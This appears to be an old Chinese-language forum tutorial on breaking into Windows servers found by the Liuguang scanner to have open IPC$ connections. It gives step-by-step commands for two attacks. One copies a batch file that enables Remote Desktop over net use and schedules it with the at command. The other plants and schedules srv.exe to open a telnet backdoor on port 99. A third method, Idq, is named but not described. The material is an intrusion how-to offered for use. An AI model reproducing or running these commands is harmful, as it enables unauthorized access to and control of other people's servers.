----------------------------------------
下载小榕流光4.7扫描存在空连接(ipc)漏洞主机
我们可以利用扫描时间.
建立几种登入模式
1、3389
2、Telnet
3、Idq
----------------------------------------
1、3389入侵
　　在本地利用DOS命令edit建立.bat后缀批处理文件(文件名随意)

　　echo [Components] > c:\sql

　　echo TSEnable = on >>

　　c:\sqlsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q

　　net use \\ip地址\ipc$密码/user:用户名(一般默认:administrator)

　　利用at time获取对方服务器时间。

　　copy路径:\xxx.bat \\ip地址\$c:\winnt

　　at time 00:00:00 xxx.bat

　　服务器执行命令后，服务器将重新启动，利用3389登陆(登入器软件区有下载

2、Telnet入侵

　　在流光早期版本中含有srv.exe

　　net use \\ip地址\ipc$密码/user:用户名(一般默认:administrator)

　　利用at time获取对方服务器时间。

　　copy路径:\srv.exe \\ip地址\$c:\winnt

　　at time 00:00:00 srv.exe

　　telnet \\ip地址端口(默认99)

　　此时你想做什么就做什么吧。呵呵

3、Idq